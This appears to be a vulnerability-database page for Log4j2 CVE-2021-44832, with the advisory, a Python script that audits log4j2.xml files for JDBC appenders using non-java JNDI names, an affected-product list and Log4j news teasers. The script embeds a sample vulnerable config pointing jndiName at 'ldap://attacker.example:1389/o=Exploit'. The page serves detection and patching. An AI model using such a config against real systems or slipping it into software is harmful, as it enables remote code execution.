Apache Log4j2 versions 2.0-beta7 up to and including 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI and an attacker controls the LDAP server that URI points to. The issue is fixed in Log4j2 versions 2.17.1, 2.12.4 and 2.3.2 by limiting JNDI data source names to the java protocol.
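The condition above is a configuration property, so it can be audited statically. The following Python script is an added example, not code from the Log4j project or from this page: it scans a log4j2.xml document for JDBC appenders whose `DataSource` `jndiName` uses a scheme other than `java` (the same rule 2.17.1 enforces at lookup time, where a name with no scheme or the `java` scheme is accepted and anything else such as `ldap`, `ldaps` or `rmi` is refused). Both sample configurations, the appender name `databaseAppender` and the host `attacker.example` are constructed for the example.

```python
"""Audit Log4j2 XML configurations for the CVE-2021-44832 precondition:
a JDBC appender whose DataSource jndiName resolves through a non-java
JNDI scheme (ldap, ldaps, rmi, dns, ...).  Added example; the configs
below are constructed, not taken from a real deployment."""
from urllib.parse import urlsplit
import xml.etree.ElementTree as ET

# Constructed vulnerable configuration: the data source is fetched from an
# attacker-controlled LDAP server, so on Log4j2 < 2.17.1 the lookup can
# return a serialized object / remote class reference and execute code.
VULNERABLE_CONFIG = """
<Configuration status="WARN">
  <Appenders>
    <JDBC name="databaseAppender" tableName="LOGGING">
      <DataSource jndiName="ldap://attacker.example:1389/o=Exploit" />
      <Column name="MESSAGE" pattern="%message" />
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="databaseAppender"/></Root>
  </Loggers>
</Configuration>
"""

# Constructed hardened configuration: the data source lives in the
# container's java: namespace, which is the only scheme 2.17.1 allows.
HARDENED_CONFIG = """
<Configuration status="WARN">
  <Appenders>
    <Appender type="JDBC" name="databaseAppender" tableName="LOGGING">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource" />
      <Column name="MESSAGE" pattern="%message" />
    </Appender>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="databaseAppender"/></Root>
  </Loggers>
</Configuration>
"""


def jndi_scheme_allowed(jndi_name: str) -> bool:
    """Mirror the 2.17.1 rule: a name with no URI scheme (plain initial
    context name such as 'jdbc/LoggingDataSource') or with the java scheme
    may be looked up; any other scheme is refused."""
    scheme = urlsplit(jndi_name).scheme  # urlsplit lower-cases the scheme
    return scheme == "" or scheme == "java"


def _is_jdbc_appender(elem: ET.Element) -> bool:
    """Log4j2 accepts both <JDBC .../> and <Appender type="JDBC" .../>."""
    return elem.tag == "JDBC" or (
        elem.tag == "Appender" and elem.get("type", "").upper() == "JDBC"
    )


def find_unsafe_jdbc_datasources(config_xml: str) -> list:
    """Return (appender name, jndiName) pairs for every JDBC appender whose
    DataSource would be resolved through a non-java JNDI scheme."""
    root = ET.fromstring(config_xml)
    findings = []
    for elem in root.iter():
        if not _is_jdbc_appender(elem):
            continue
        for ds in elem.findall("DataSource"):
            name = ds.get("jndiName", "")
            if not jndi_scheme_allowed(name):
                findings.append((elem.get("name"), name))
    return findings


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG),
                       ("hardened", HARDENED_CONFIG)):
        print(label, find_unsafe_jdbc_datasources(cfg))
```

Run it over every log4j2.xml you ship; any finding means the config must be changed even after the library is upgraded, since the upgraded library will refuse the lookup and the appender will simply stop writing. The scheme check is necessary but not sufficient on its own: the LDAP server being under attacker control is what turns the lookup into code execution, so also confirm that the JNDI provider the java: name resolves to is the application container's own.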
Vulnerable Product |
---|
apache log4j |
apache log4j 2.0 |
oracle communications diameter signaling router |
oracle communications interactive session recorder 6.3 |
oracle communications interactive session recorder 6.4 |
oracle primavera gateway |
oracle primavera gateway 21.12.0 |
oracle primavera p6 enterprise project portfolio management |
oracle primavera p6 enterprise project portfolio management 21.12.0.0 |
oracle primavera unifier 18.8 |
oracle primavera unifier 19.12 |
oracle primavera unifier 20.12 |
oracle primavera unifier 21.12 |
oracle retail assortment planning 16.0.3 |
oracle retail fiscal management 14.2 |
oracle siebel ui framework 21.12 |
oracle weblogic server 12.2.1.3.0 |
oracle weblogic server 12.2.1.4.0 |
oracle weblogic server 14.1.1.0.0 |
cisco cloudcenter 4.10.0.16 |
fedoraproject fedora 34 |
fedoraproject fedora 35 |
debian debian linux 9.0 |
oracle communications brm - elastic charging engine |
oracle communications brm - elastic charging engine 12.0.0.5.0 |
oracle communications offline mediation controller |
oracle communications offline mediation controller 12.0.0.5.0 |
oracle flexcube private banking 12.1.0 |
oracle health sciences data management workbench 2.5.2.1 |
oracle health sciences data management workbench 3.0.0.0 |
oracle health sciences data management workbench 3.1.0.3 |
oracle policy automation |
oracle policy automation for mobile devices |
oracle product lifecycle analytics 3.6.1 |
oracle retail order broker 18.0 |
oracle retail order broker 19.1 |
oracle retail xstore point of service 17.0.4 |
oracle retail xstore point of service 18.0.3 |
oracle retail xstore point of service 19.0.2 |
oracle retail xstore point of service 20.0.1 |
oracle retail xstore point of service 21.0.1 |
oracle siebel ui framework |
IT threat evolution in Q3 2022. Non-mobile statistics. Mobile statistics. These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: according to Kaspersky Security Network, in Q3 2022 Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...
It's not as though folks haven't been warned about this
There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks. Tracked as CVE-2021-44228 aka L...
Apply fixes responsibly in a timely manner or face the wrath of Lina Khan
The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...
Lack of awareness still blamed for patching apathy despite it being among most infamous bugs of all time
Two years after the Log4Shell vulnerability in the open source Java-based Log4j logging utility was disclosed, circa one in four applications are dependent on outdated libraries, leaving them open to exploitation. Research from security shop Veracode revealed that the vast majority of vulnerable apps may never have updated the Log4j library after it was implemented by developers, as 32 percent were running pre-2015 EOL versions. Prior investigations from Veracode also showed that 79 percent of al...